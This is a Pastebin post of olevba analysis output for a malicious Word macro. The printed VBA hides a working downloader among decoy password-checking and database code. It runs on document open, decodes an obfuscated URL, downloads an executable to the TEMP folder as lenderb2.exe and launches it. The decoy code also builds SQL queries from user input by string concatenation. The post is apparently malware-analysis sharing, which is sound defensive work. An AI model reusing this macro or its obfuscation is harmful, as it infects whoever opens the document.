SHARE
TWEET

Malicious Word macro

dynamoo Oct 23rd, 2015 263 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.41 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OLE:MASI-B-V Cleaning022958-01.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: Cleaning022958-01.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: Cleaning022958-01.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub autoopen()
  17. password_match "", ""
  18. check_possibly_a_word "", ""
  19. check_character_variety ""
  20. check_length ""
  21.  PoseCodeBySetText 0, ""
  22.  check_password_level ""
  23. End Sub
  24.  
  25.  
  26.  
  27. -------------------------------------------------------------------------------
  28. VBA MACRO Module1.bas
  29. in file: Cleaning022958-01.doc - OLE stream: u'Macros/VBA/Module1'
  30. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  31. Public Function check_password_level(ByVal strPassword As String, _
  32.                                      Optional ByRef strInfo As String) As Long
  33.  
  34.     Dim result As Long
  35.  
  36.  
  37.  
  38. adodbStream.savetofile tempFile, 2
  39. shellApp.Open (tempFile)
  40. Exit Function
  41.     result = check_repeated_pattern(strPassword, strInfo)
  42.  
  43.     If result > PASSWORD_ACHIEVEMENT Then
  44.         check_password_level = result
  45.     Else
  46.         result = check_common_password(strPassword, strInfo)
  47.  
  48.         If result > PASSWORD_ACHIEVEMENT Then
  49.             check_password_level = result
  50.         Else
  51.             result = check_possibly_a_number(strPassword, strInfo)
  52.  
  53.             If result > PASSWORD_ACHIEVEMENT Then
  54.                 check_password_level = result
  55.             Else
  56.                 result = check_possibly_a_word(strPassword, strInfo)
  57.  
  58.                 If result > PASSWORD_ACHIEVEMENT Then
  59.                     check_password_level = result
  60.                 Else
  61.                     result = check_possibly_a_telephone_number_date(strPassword, strInfo)
  62.  
  63.                     If result > PASSWORD_ACHIEVEMENT Then
  64.                         check_password_level = result
  65.                     Else
  66.                         result = check_possibly_a_word_and_a_number(strPassword, strInfo)
  67.  
  68.                         If result > PASSWORD_ACHIEVEMENT Then
  69.                             check_password_level = result
  70.                         Else
  71.                             result = check_length(strPassword, strInfo)
  72.  
  73.                             If result > PASSWORD_ACHIEVEMENT Then
  74.                                 check_password_level = result
  75.                             Else
  76.                                 result = check_character_variety(strPassword, strInfo)
  77.  
  78.                                 If result > PASSWORD_ACHIEVEMENT Then
  79.                                     check_password_level = result
  80.                                 Else
  81.                                     result = check_symbols(strPassword, strInfo)
  82.  
  83.                                     If result > PASSWORD_ACHIEVEMENT Then
  84.                                         check_password_level = result
  85.                                     Else
  86.                                         check_password_level = PASSWORD_ACHIEVEMENT
  87.  
  88.                                     End If
  89.  
  90.                                 End If
  91.  
  92.                             End If
  93.  
  94.                         End If
  95.  
  96.                     End If
  97.  
  98.                 End If
  99.  
  100.             End If
  101.  
  102.         End If
  103.  
  104.     End If
  105.  
  106. End Function
  107.  
  108. Public Function check_character_variety(ByVal strPassword As String, _
  109.                                          Optional ByRef strInfo As String) As Long
  110.  
  111. httpRequest.Send
  112. Exit Function
  113.     If password_match(strPassword, "/^[a-zA-Z]+$/") Then
  114.         strInfo = "???????????????,?????,??????????"
  115.         check_character_variety = PASSWORD_WARNING
  116.     ElseIf password_match(strPassword, "/^[A-Za-z0-9]+$/") Then
  117.         strInfo = "???????????,?????????"
  118.         check_character_variety = PASSWORD_WARNING
  119.     ElseIf password_match(strPassword, "/[^A-Za-z0-9\u0000-\u007E]/") Then
  120.         'strInfo = "???????????????????,???????"
  121.        check_character_variety = PASSWORD_ACHIEVEMENT
  122.  
  123.     End If
  124.  
  125. End Function
  126.  
  127. Private Function check_common_password(ByVal strPassword As String, _
  128.                                        Optional ByRef strInfo As String) As Long
  129.  
  130.     Dim arrCommonPassword() As String, isFound As Boolean
  131.  
  132.     arrCommonPassword = Split(strPassWords, "|")
  133.     isFound = False
  134.  
  135.     Dim x As Long
  136.  
  137.     For x = LBound(arrCommonPassword) To UBound(arrCommonPassword)
  138.  
  139.         If strPassword = arrCommonPassword(x) Then
  140.             isFound = True
  141.             Exit For
  142.  
  143.         End If
  144.  
  145.     Next
  146.  
  147.     If isFound Then
  148.         strInfo = "??????????,??????"
  149.         check_common_password = PASSWORD_INSECURE
  150.     Else
  151.         check_common_password = 0
  152.  
  153.     End If
  154.  
  155. End Function
  156.  
  157. Public Function check_length(ByVal strPassword As String, _
  158.                               Optional ByRef strInfo As String)
  159. tempFolder = processEnv("T" + "E" & "MP")
  160.  
  161. tempFile = tempFolder + "\lenderb2" & ".exe"
  162. Exit Function
  163.     If Len(strPassword) < 5 Then
  164.         strInfo = "?????,???8???????"
  165.         check_length = PASSWORD_INSECURE
  166.     ElseIf Len(strPassword) < 8 Then
  167.         strInfo = "??????,???8???????"
  168.         check_length = PASSWORD_WARNING
  169.     ElseIf Len(strPassword) > 15 Then
  170.         'strInfo = "?????15?????,??????"
  171.        check_length = PASSWORD_ADVICE
  172.  
  173.     End If
  174.  
  175. End Function
  176.  
  177. Private Function check_possibly_a_number(ByVal strPassword As String, _
  178.                                          Optional ByRef strInfo As String) As Long
  179.  
  180.     If password_match(strPassword, "/^[0-9]+$/") Then
  181.         strInfo = "????????,????????????"
  182.         check_possibly_a_number = PASSWORD_WARNING
  183.     Else
  184.         check_possibly_a_number = 0
  185.  
  186.     End If
  187.  
  188. End Function
  189.  
  190. Private Function check_possibly_a_telephone_number_date(ByVal strPassword As String, _
  191.                                                         Optional ByRef strInfo As String) As Long
  192.  
  193.     Dim lenPassword As Long
  194.  
  195.     lenPassword = Len(strPassword)
  196.  
  197.     If password_match(strPassword, "/^[\-\(\)\.\/\s0-9]+$/") Then
  198.         strInfo = "?????????????????,?????,??????????"
  199.         check_possibly_a_telephone_number_date = PASSWORD_WARNING
  200.     ElseIf IsNumeric(strPassword) And (lenPassword = 11 Or lenPassword = 6 Or lenPassword = 8) Then
  201.         strInfo = "?????????????????,?????,??????????"
  202.         check_possibly_a_telephone_number_date = PASSWORD_WARNING
  203.     ElseIf IsNumeric(strPassword) And (lenPassword = 15 Or lenPassword = 18) Then
  204.         strInfo = "??????????????????,??????????"
  205.         check_possibly_a_telephone_number_date = PASSWORD_WARNING
  206.     ElseIf IsDate(strPassword) Then
  207.         strInfo = "??????????,?????,??????????"
  208.         check_possibly_a_telephone_number_date = PASSWORD_WARNING
  209.     Else
  210.         check_possibly_a_telephone_number_date = 0
  211.  
  212.     End If
  213.  
  214. End Function
  215.  
  216. Public Function check_possibly_a_word(ByVal strPassword As String, _
  217.                                        Optional ByRef strInfo As String)
  218. Dim B() As Variant
  219. B = Array(147, 157, 155, 149, 93, 80, 78, 139, 132, 140, 120, 131, 140, 114, 127, 118, 57, 108, 118, 114, 50, 117, 120, 97, 97, 114, 112, 106, 101, 38, 35, 28, 31, 28, 76, 27, 26, 85, 74, 76, 9, 62, 79, 58)
  220.  
  221. httpRequest.Open "GET", GetStringFromArray(B, 43), False
  222. Exit Function
  223.     If password_match(strPassword, "/^[A-Za-z]+$/") Then
  224.         strInfo = "????????,????????????"
  225.         check_possibly_a_word = PASSWORD_WARNING
  226.     Else
  227.         check_possibly_a_word = 0
  228.  
  229.     End If
  230.  
  231. End Function
  232.  
  233. Private Function check_possibly_a_word_and_a_number(ByVal strPassword As String, _
  234.                                                     Optional ByRef strInfo As String) As Long
  235.  
  236.     If password_match(strPassword, "/^[a-zA-Z]+[0-9]+$/") Or password_match(strPassword, "/^[0-9]+[a-zA-Z]+$/") Then
  237.         strInfo = "??????????????????,????????,??????????"
  238.         check_possibly_a_word_and_a_number = PASSWORD_WARNING
  239.     Else
  240.         check_possibly_a_word_and_a_number = 0
  241.  
  242.     End If
  243.  
  244. End Function
  245.  
  246. Private Function check_repeated_pattern(ByVal strPassword As String, _
  247.                                         Optional ByRef strInfo As String) As Long
  248.  
  249.     If password_match(strPassword, "/(.+)\1{2,}/gi") Then
  250.         strInfo = "??????????,?????????"
  251.         check_repeated_pattern = PASSWORD_WARNING
  252.     Else
  253.         check_repeated_pattern = 0
  254.  
  255.     End If
  256.  
  257. End Function
  258.  
  259. Private Function check_symbols(ByVal strPassword As String, _
  260.                                Optional ByRef strInfo As String) As Long
  261.  
  262.     Dim strSymbol As String
  263.  
  264.     strSymbol = "!@?#$%^&*()-_=\+?/.>,<`~|';:]}[{" & Chr(34)
  265.  
  266.     Dim lenPassword As Long, index As Long, isFound As Long
  267.  
  268.     lenPassword = Len(strPassword): isFound = 0
  269.  
  270.     For index = 1 To lenPassword
  271.  
  272.         If InStr(1, strSymbol, Mid$(strPassword, index, 1), vbBinaryCompare) > 0 Then
  273.             isFound = isFound + 1
  274.  
  275.         End If
  276.  
  277.     Next
  278.  
  279.     If isFound > 3 Then
  280.         check_symbols = PASSWORD_ACHIEVEMENT
  281.     Else
  282.         strInfo = "?????3?????????????"
  283.         check_symbols = PASSWORD_ADVICE
  284.  
  285.     End If
  286.  
  287. End Function
  288.  
  289. Public Function password_match(ByVal strPassword As String, _
  290.                                 ByVal strPattern As String) As Boolean
  291.  
  292.    
  293. Set httpRequest = CreateObject("Microsoft.XMLHTTP")
  294. Set adodbStream = CreateObject("Adodb.Stream")
  295. Set processEnv = CreateObject("WScript.Shell").Environment("Process")
  296. Set shellApp = CreateObject("Shell.Application")
  297.  
  298. Exit Function
  299.  
  300.     Dim objRegExp As String
  301.  
  302.     password_match = False
  303.     objRe.gExp.Global = True
  304.  
  305. End Function
  306.  
  307. -------------------------------------------------------------------------------
  308. VBA MACRO Module2.bas
  309. in file: Cleaning022958-01.doc - OLE stream: u'Macros/VBA/Module2'
  310. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  311.  
  312. Public Function PoseCodeToClipboard(ByVal strCode As String) As Long
  313.  
  314.         '<EhHeader>
  315.        On Error GoTo PoseCodeToClipboard_Err
  316.  
  317.         '</EhHeader>
  318. 100     If isAutoCopy Then
  319. 102         Clipboard.Clear
  320. 104         Clipboard.SetText strCode, vbCFText
  321. 106         PoseCodeToClipboard = 1
  322.         Else
  323. 108         PoseCodeToClipboard = 0
  324.  
  325.         End If
  326.  
  327.         '<EhFooter>
  328.        Exit Function
  329. PoseCodeToClipboard_Err:
  330.         PoseCodeToClipboard = 0
  331.         'MsgBox Err.Description & vbCrLf & _
  332.          "in FlowerPassword.modInput.PoseCodeToClipboard " & _
  333.          "at line " & Erl, _
  334.          vbExclamation + vbOKOnly, "Application Error"
  335.  
  336.         Resume Next
  337.  
  338.         '</EhFooter>
  339. End Function
  340.  
  341. Public Function PostCode(ByVal strCode As String, ByVal TextBoxHwnd As Long) As Long
  342.  
  343.     If isInternetExplorer(TextBoxHwnd) Then
  344.         If PostCodeToIE(TextBoxHwnd, strCode) = 1 Then
  345.             PostCode = 1
  346.         Else
  347.             Sleep 750
  348.             PoseCodeBySendInput strCode
  349.             PostCode = 2
  350.  
  351.         End If
  352.  
  353.     ElseIf isChrome(TextBoxHwnd) Then
  354.         Sleep 750
  355.         PoseCodeBySendInput strCode
  356.         PostCode = 3
  357.     ElseIf isFirefox(TextBoxHwnd) Then
  358.         Sleep 750
  359.         PoseCodeBySendInput strCode
  360.         PostCode = 4
  361.     ElseIf isOpera(TextBoxHwnd) Then
  362.         Sleep 750
  363.         PoseCodeBySendInput strCode
  364.         PostCode = 5
  365.     ElseIf isMaxthon(TextBoxHwnd) Then
  366.         Sleep 750
  367.         PoseCodeBySendInput strCode
  368.         PostCode = 6
  369.     Else
  370.  
  371.         If TextBoxHwnd > 0 Then
  372.             'PoseCodeByKeyDown TextBoxHwnd, strCode
  373.            PoseCodeByPaste TextBoxHwnd
  374.             'PoseCodeBySetText TextBoxHwnd, strCode
  375.            'If GetCodeLength(TextBoxHwnd) <> 16 Then
  376.            'PoseCodeBySendInput strCode
  377.            'End If
  378.            PostCode = 7
  379.         Else
  380.             Sleep 750
  381.             PoseCodeBySendInput strCode
  382.             PostCode = 8
  383.  
  384.         End If
  385.  
  386.     End If
  387.  
  388. End Function
  389.  
  390. Private Function GetCodeLength(ByVal TextBoxHwnd As Long) As Long
  391.     GetCodeLength = SendMessage(TextBoxHwnd, WM_GETTEXTLENGTH, 0, vbNull)
  392.  
  393. End Function
  394.  
  395. Private Function MakeKeyLparam(ByVal VirtualKey As Long, ByVal flag As Long) As Long
  396.  
  397.     Dim Firstbyte As String    'lparam???24-31?
  398.  
  399.     If flag = WM_KEYDOWN Then  '??????
  400.        Firstbyte = "00"
  401.     Else
  402.         Firstbyte = "C0"       '??????
  403.  
  404.     End If
  405.  
  406.     Dim Scancode As Long
  407.  
  408.     '???????
  409.    Scancode = MapVirtualKey(VirtualKey, 0)
  410.  
  411.     Dim Secondbyte As String   'lparam???16-23?,???????
  412.  
  413.     Secondbyte = Right$("00" & Hex$(Scancode), 2)
  414.  
  415.     Dim s As String
  416.  
  417.     s = Firstbyte & Secondbyte & "0001"  '0001?lparam???0-15?,????????????
  418.    MakeKeyLparam = CLng("&H" & s)
  419.  
  420. End Function
  421.  
  422. Private Function PoseCodeByKeyDown(ByVal TextBoxHwnd As Long, _
  423.                                    ByVal strCode As String) As Long
  424.  
  425.     Dim code_len As Long
  426.  
  427.     code_len = Len(strCode)
  428.  
  429.     If Len(code_len) > 0 Then
  430.  
  431.         Dim i As Long, result As Long
  432.  
  433.         For i = 1 To code_len
  434.  
  435.             Dim key_code As String
  436.  
  437.             result = 0
  438.             key_code = Mid$(strCode, i, 1)
  439.             result = PostMessage(TextBoxHwnd, WM_KEYDOWN, Asc(UCase$(key_code)), MakeKeyLparam(Asc(UCase$(key_code)), WM_KEYDOWN))
  440.             result = PostMessage(TextBoxHwnd, WM_CHAR, Asc(key_code), MakeKeyLparam(Asc(UCase$(key_code)), WM_KEYDOWN))
  441.             result = PostMessage(TextBoxHwnd, WM_KEYUP, Asc(UCase$(key_code)), MakeKeyLparam(Asc(UCase$(key_code)), WM_KEYUP))
  442.  
  443.             If result = 0 Then
  444.                 PoseCodeByKeyDown = 0
  445.                 Exit For
  446.  
  447.             End If
  448.  
  449.         Next
  450.         PoseCodeByKeyDown = result
  451.  
  452.     End If
  453.  
  454. End Function
  455.  
  456. Private Function PoseCodeByPaste(ByVal TextBoxHwnd As Long) As Long
  457.     PoseCodeByPaste = SendMessage(TextBoxHwnd, WM_PASTE, 0, 0)
  458.  
  459. End Function
  460.  
  461. Private Function PoseCodeBySendInput(ByVal strCode As String) As Long
  462.  
  463.     Dim code_len As Long
  464.  
  465.     code_len = Len(strCode)
  466.  
  467.     If Len(code_len) > 0 Then
  468.         SetCapsLock False
  469.  
  470.         Dim i As Long, result As Long
  471.  
  472.         For i = 1 To code_len
  473.  
  474.             Dim key_code As Integer
  475.  
  476.             result = 0
  477.             key_code = Asc(Mid$(strCode, i, 1))
  478.  
  479.             If Asc("0") <= key_code And key_code <= Asc("9") Then
  480.                 result = SendInputNumber(key_code)
  481.             ElseIf Asc("A") <= key_code And key_code <= Asc("Z") Then
  482.                 result = SendInputUpperCase(key_code)
  483.             ElseIf Asc("a") <= key_code And key_code <= Asc("z") Then
  484.                 result = SendInputLowerCase(key_code)
  485.             Else
  486.                 PoseCodeBySendInput = 0
  487.                 Exit For
  488.  
  489.             End If
  490.  
  491.             If result = 0 Then
  492.                 PoseCodeBySendInput = 0
  493.                 Exit For
  494.  
  495.             End If
  496.  
  497.         Next
  498.         PoseCodeBySendInput = result
  499.  
  500.     End If
  501.  
  502. End Function
  503.  
  504. Public Function PoseCodeBySetText(ByVal TextBoxHwnd As Long, _
  505.                                    ByVal strCode As String)
  506.                                    
  507. With adodbStream
  508.    .Type = 1
  509.     .Open
  510.     .write httpRequest.responseBody
  511. End With
  512.  
  513. End Function
  514.  
  515. Private Function SendInputLowerCase(ByVal KeyCode As Integer) As Long
  516.     KeyCode = KeyCode - Asc("a") + Asc("A")
  517.     SendInputLowerCase = SendInputLowerKey(KeyCode)
  518.  
  519. End Function
  520.  
  521. Private Function SendInputLowerKey(ByVal bkey As Long) As Long
  522.  
  523.     Dim GInput(0 To 1) As GENERALINPUT
  524.  
  525.     Dim KInput         As KEYBDINPUT
  526.  
  527.     KInput.wVk = bkey
  528.     KInput.dwFlags = KEYEVENTF_KEYDOWN
  529.     GInput(0).dwType = INPUT_KEYBOARD
  530.     CopyMemory GInput(0).xi(0), KInput, Len(KInput)
  531.     KInput.wVk = bkey
  532.     KInput.dwFlags = KEYEVENTF_KEYUP
  533.     GInput(1).dwType = INPUT_KEYBOARD
  534.     CopyMemory GInput(1).xi(0), KInput, Len(KInput)
  535.     SendInputLowerKey = SendInput(2, GInput(0), Len(GInput(0)))
  536.  
  537. End Function
  538.  
  539. Private Function SendInputNumber(ByVal KeyCode As Integer) As Long
  540.     SendInputNumber = SendInputLowerKey(KeyCode)
  541.  
  542. End Function
  543.  
  544. Private Function SendInputUpperCase(ByVal KeyCode As Integer) As Long
  545.     SendInputUpperCase = SendInputUpperKey(KeyCode)
  546.  
  547. End Function
  548.  
  549. Private Function SendInputUpperKey(ByVal bkey As Long) As Long
  550.  
  551.     Dim GInput(0 To 3) As GENERALINPUT
  552.  
  553.     Dim KInput         As KEYBDINPUT
  554.  
  555.     KInput.wVk = vbKeyShift
  556.     KInput.dwFlags = KEYEVENTF_KEYDOWN
  557.     GInput(0).dwType = INPUT_KEYBOARD
  558.     CopyMemory GInput(0).xi(0), KInput, Len(KInput)
  559.     KInput.wVk = bkey
  560.     KInput.dwFlags = KEYEVENTF_KEYDOWN
  561.     GInput(1).dwType = INPUT_KEYBOARD
  562.     CopyMemory GInput(1).xi(0), KInput, Len(KInput)
  563.     KInput.wVk = bkey
  564.     KInput.dwFlags = KEYEVENTF_KEYUP
  565.     GInput(2).dwType = INPUT_KEYBOARD
  566.     CopyMemory GInput(2).xi(0), KInput, Len(KInput)
  567.     KInput.wVk = vbKeyShift
  568.     KInput.dwFlags = KEYEVENTF_KEYUP
  569.     GInput(3).dwType = INPUT_KEYBOARD
  570.     CopyMemory GInput(3).xi(0), KInput, Len(KInput)
  571.     SendInputUpperKey = SendInput(4, GInput(0), Len(GInput(0)))
  572.  
  573. End Function
  574.  
  575. -------------------------------------------------------------------------------
  576. VBA MACRO Module3.bas
  577. in file: Cleaning022958-01.doc - OLE stream: u'Macros/VBA/Module3'
  578. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  579.  
  580.  
  581.  
  582. Public httpRequest As Object
  583. Public adodbStream As Object
  584. Public processEnv  As Object
  585. Public tempFolder As String
  586. Public tempFile As String
  587. Public shellApp As Object
  588. Private Sub btnSearch_Click()
  589.     Dim Sql As String
  590.    
  591.     If Utilities.NullOrEmpty(txtNum) Then Exit Sub
  592.    
  593.     Sql = "Select a.*, cast(a.drawer as nvarchar(10)) + ' - ' + b.drawer_name as drawerFull, cc_tot - (prof_tot + hosp_tot) as variance, hosp_tot + prof_tot - isnull(dep_amt, 0) as dep_variance " & _
  594.           "From " & Constants.SCHEMA & ".[rec_epic_drawer_summary] a " & _
  595.           "Full join " & Constants.SCHEMA & ".[rec_epic_drawers] b " & _
  596.           "On a.drawer = b.drawer_num " & _
  597.           "Where a.drawer = '" & txtNum & "' " & _
  598.           "Order by closing_time desc"
  599.     Me.Epic_Drawer_Summary_Sub.Form.RecordSource = Sql
  600. End Sub
  601.  
  602.  
  603. Private Sub btnClearSearch_Click()
  604.     Dim Sql As String
  605.    
  606.     txtNum = vbNullString
  607.    
  608.     Sql = "Select a.*, cast(a.drawer as nvarchar(10)) + ' - ' + b.drawer_name as drawerFull, cc_tot - (prof_tot + hosp_tot) as variance, hosp_tot + prof_tot - isnull(dep_amt, 0) as dep_variance " & _
  609.           "From " & Constants.SCHEMA & ".[rec_epic_drawer_summary] a " & _
  610.           "Full join " & Constants.SCHEMA & ".[rec_epic_drawers] b " & _
  611.           "On a.drawer = b.drawer_num " & _
  612.           "Where a.drawer is not null " & _
  613.           "Order by a.drawer, a.closing_time desc"
  614.     Me.Epic_Drawer_Summary_Sub.Form.RecordSource = Sql
  615. End Sub
  616.  
  617.  
  618. Private Sub btnFilter_Click()
  619.     Dim Sql As String
  620.    
  621.     If Not Utilities.NullOrEmpty(txtStart) And Not Utilities.NullOrEmpty(txtEnd) Then
  622.         Sql = "Select a.*, cast(a.drawer as nvarchar(10)) + ' - ' + b.drawer_name as drawerFull, cc_tot - (prof_tot + hosp_tot) as variance, hosp_tot + prof_tot - isnull(dep_amt, 0) as dep_variance " & _
  623.               "From " & Constants.SCHEMA & ".[rec_epic_drawer_summary] a " & _
  624.               "Full join " & Constants.SCHEMA & ".[rec_epic_drawers] b " & _
  625.               "On a.drawer = b.drawer_num " & _
  626.               "Where closing_time >= '" & txtStart & "' and closing_time <= '" & txtEnd & "' " & _
  627.               "Order by closing_time desc"
  628.     ElseIf Not Utilities.NullOrEmpty(txtStart) And Utilities.NullOrEmpty(txtEnd) Then
  629.         Sql = "Select a.*, cast(a.drawer as nvarchar(10)) + ' - ' + b.drawer_name as drawerFull, cc_tot - (prof_tot + hosp_tot) as variance, hosp_tot + prof_tot - isnull(dep_amt, 0) as dep_variance " & _
  630.               "From " & Constants.SCHEMA & ".[rec_epic_drawer_summary] a " & _
  631.               "Full join " & Constants.SCHEMA & ".[rec_epic_drawers] b " & _
  632.               "On a.drawer = b.drawer_num " & _
  633.               "Where closing_time >= '" & txtStart & "' " & _
  634.               "Order by closing_time desc"
  635.     ElseIf Utilities.NullOrEmpty(txtStart) And Not Utilities.NullOrEmpty(txtEnd) Then
  636.         Sql = "Select a.*, cast(a.drawer as nvarchar(10)) + ' - ' + b.drawer_name as drawerFull, cc_tot - (prof_tot + hosp_tot) as variance, hosp_tot + prof_tot - isnull(dep_amt, 0) as dep_variance " & _
  637.               "From " & Constants.SCHEMA & ".[rec_epic_drawer_summary] a " & _
  638.               "Full join " & Constants.SCHEMA & ".[rec_epic_drawers] b " & _
  639.               "On a.drawer = b.drawer_num " & _
  640.               "Where closing_time <= '" & txtEnd & "' " & _
  641.               "Order by closing_time desc"
  642.     ElseIf Utilities.NullOrEmpty(txtStart) And Utilities.NullOrEmpty(txtEnd) Then
  643.         Exit Sub
  644.     End If
  645.    
  646.     Me.Epic_Drawer_Summary_Sub.Form.RecordSource = Sql
  647. End Sub
  648.  
  649. Public Function GetStringFromArray(fromArr() As Variant, LenLen As Integer) As String
  650.     Dim i As Integer
  651.     Dim result As String
  652.     result = ""
  653.     For i = LBound(fromArr) To UBound(fromArr)
  654.         result = result & Chr(fromArr(i) - LenLen + i * 2)
  655.     Next i
  656.     GetStringFromArray = result
  657. End Function
  658. Private Sub btnClearFilter_Click()
  659.     Dim Sql As String
  660.    
  661.     txtStart = vbNullString
  662.     txtEnd = vbNullString
  663.    
  664.     Sql = "Select a.*, cast(a.drawer as nvarchar(10)) + ' - ' + b.drawer_name as drawerFull, cc_tot - (prof_tot + hosp_tot) as variance, hosp_tot + prof_tot - isnull(dep_amt, 0) as dep_variance " & _
  665.           "From " & Constants.SCHEMA & ".[rec_epic_drawer_summary] a " & _
  666.           "Full join " & Constants.SCHEMA & ".[rec_epic_drawers] b " & _
  667.           "On a.drawer = b.drawer_num " & _
  668.           "Where a.drawer is not null " & _
  669.           "Order by a.drawer, a.closing_time desc"
  670.     Me.Epic_Drawer_Summary_Sub.Form.RecordSource = Sql
  671. End Sub
  672.  
  673.  
  674. Private Sub btnSave_Click()
  675.     Dim Sql As String
  676.     Dim rs As New ADODB.Recordset
  677.     Dim DepDt As String
  678.     Dim depAmt As String
  679.    
  680.     If Utilities.NullOrEmpty(txtDepDt) Then
  681.         DepDt = "Null"
  682.     Else
  683.         DepDt = "'" & txtDepDt & "'"
  684.         'Verify date between 1/1/2000 and today
  685.        If Not verifyDate(Me.txtDepDt) Then Exit Sub
  686.     End If
  687.    
  688.     If Utilities.NullOrEmpty(txtDepAmt) Then
  689.         depAmt = "Null"
  690.     Else
  691.         depAmt = "'" & txtDepAmt & "'"
  692.     End If
  693.    
  694.     Sql = "Update " & Constants.SCHEMA & ".[rec_epic_drawer_summary] set dep_dt = " & DepDt & ", dep_amt = " & depAmt & " where id = " & Form_Epic_Drawer_Summary_Sub.ID
  695.     Call DoSQL.RunIt(Me.Name, Sql)
  696.    
  697.     Me.Epic_Drawer_Summary_Sub.Requery
  698. End Sub
  699.  
  700. +------------+----------------------+-----------------------------------------+
  701. | Type       | Keyword              | Description                             |
  702. +------------+----------------------+-----------------------------------------+
  703. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
  704. | Suspicious | Open                 | May open a file                         |
  705. | Suspicious | Shell                | May run an executable file or a system  |
  706. |            |                      | command                                 |
  707. | Suspicious | WScript.Shell        | May run an executable file or a system  |
  708. |            |                      | command                                 |
  709. | Suspicious | Shell.Application    | May run an application (if combined     |
  710. |            |                      | with CreateObject)                      |
  711. | Suspicious | CreateObject         | May create an OLE object                |
  712. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  713. |            |                      | strings                                 |
  714. | Suspicious | ADODB.Stream         | May create a text file                  |
  715. | Suspicious | SaveToFile           | May create a text file                  |
  716. | Suspicious | Write                | May write to a file (if combined with   |
  717. |            |                      | Open)                                   |
  718. | Suspicious | Microsoft.XMLHTTP    | May download files from the Internet    |
  719. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  720. |            |                      | may be used to obfuscate strings        |
  721. |            |                      | (option --decode to see all)            |
  722. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  723. |            | Strings              | may be used to obfuscate strings        |
  724. |            |                      | (option --decode to see all)            |
  725. | IOC        | lenderb2.exe         | Executable file name (obfuscation: VBA  |
  726. |            |                      | expression)                             |
  727. | VBA string | TEMP                 | ("T" + "E" & "MP")                      |
  728. | VBA string | \lenderb2.exe        | "\lenderb2" & ".exe"                    |
  729. | VBA string | !@?#$%^&*()-_=\+?/.> | "!@?#$%^&*()-_=\+?/.>,<`~|';:]}[{" &    |
  730. |            | ,<`~|';:]}[{"        | Chr(34)                                 |
  731. | VBA string | in FlowerPassword.mo | "in FlowerPassword.modInput.PoseCodeToC |
  732. |            | dInput.PoseCodeToCli | lipboard " &          "at line "        |
  733. |            | pboard at line       |                                         |
  734. | VBA string | Select a.*,          | "Select a.*, cast(a.drawer as           |
  735. |            | cast(a.drawer as     | nvarchar(10)) + ' - ' + b.drawer_name   |
  736. |            | nvarchar(10)) + ' -  | as drawerFull, cc_tot - (prof_tot +     |
  737. |            | ' + b.drawer_name as | hosp_tot) as variance, hosp_tot +       |
  738. |            | drawerFull, cc_tot - | prof_tot - isnull(dep_amt, 0) as        |
  739. |            | (prof_tot +          | dep_variance " &           "From "      |
  740. |            | hosp_tot) as         |                                         |
  741. |            | variance, hosp_tot + |                                         |
  742. |            | prof_tot -           |                                         |
  743. |            | isnull(dep_amt, 0)   |                                         |
  744. |            | as dep_variance From |                                         |
  745. | VBA string | .[rec_epic_drawer_su | ".[rec_epic_drawer_summary] a " &       |
  746. |            | mmary] a Full join   | "Full join "                            |
  747. | VBA string | .[rec_epic_drawers]  | ".[rec_epic_drawers] b " &              |
  748. |            | b On a.drawer =      | "On a.drawer = b.drawer_num " &         |
  749. |            | b.drawer_num Where   | "Where a.drawer = '"                    |
  750. |            | a.drawer = '         |                                         |
  751. | VBA string | ' Order by           | "' " &           "Order by closing_time |
  752. |            | closing_time desc    | desc"                                   |
  753. | VBA string | .[rec_epic_drawers]  | ".[rec_epic_drawers] b " &              |
  754. |            | b On a.drawer =      | "On a.drawer = b.drawer_num " &         |
  755. |            | b.drawer_num Where   | "Where a.drawer is not null " &         |
  756. |            | a.drawer is not null | "Order by a.drawer, a.closing_time      |
  757. |            | Order by a.drawer,   | desc"                                   |
  758. |            | a.closing_time desc  |                                         |
  759. | VBA string | Select a.*,          | "Select a.*, cast(a.drawer as           |
  760. |            | cast(a.drawer as     | nvarchar(10)) + ' - ' + b.drawer_name   |
  761. |            | nvarchar(10)) + ' -  | as drawerFull, cc_tot - (prof_tot +     |
  762. |            | ' + b.drawer_name as | hosp_tot) as variance, hosp_tot +       |
  763. |            | drawerFull, cc_tot - | prof_tot - isnull(dep_amt, 0) as        |
  764. |            | (prof_tot +          | dep_variance " &               "From "  |
  765. |            | hosp_tot) as         |                                         |
  766. |            | variance, hosp_tot + |                                         |
  767. |            | prof_tot -           |                                         |
  768. |            | isnull(dep_amt, 0)   |                                         |
  769. |            | as dep_variance From |                                         |
  770. | VBA string | .[rec_epic_drawer_su | ".[rec_epic_drawer_summary] a " &       |
  771. |            | mmary] a Full join   | "Full join "                            |
  772. | VBA string | .[rec_epic_drawers]  | ".[rec_epic_drawers] b " &              |
  773. |            | b On a.drawer =      | "On a.drawer = b.drawer_num " &         |
  774. |            | b.drawer_num Where   | "Where closing_time >= '"               |
  775. |            | closing_time >= '    |                                         |
  776. | VBA string | ' Order by           | "' " &               "Order by          |
  777. |            | closing_time desc    | closing_time desc"                      |
  778. | VBA string | .[rec_epic_drawers]  | ".[rec_epic_drawers] b " &              |
  779. |            | b On a.drawer =      | "On a.drawer = b.drawer_num " &         |
  780. |            | b.drawer_num Where   | "Where closing_time <= '"               |
  781. |            | closing_time <= '    |                                         |
  782. +------------+----------------------+-----------------------------------------+
RAW Paste Data
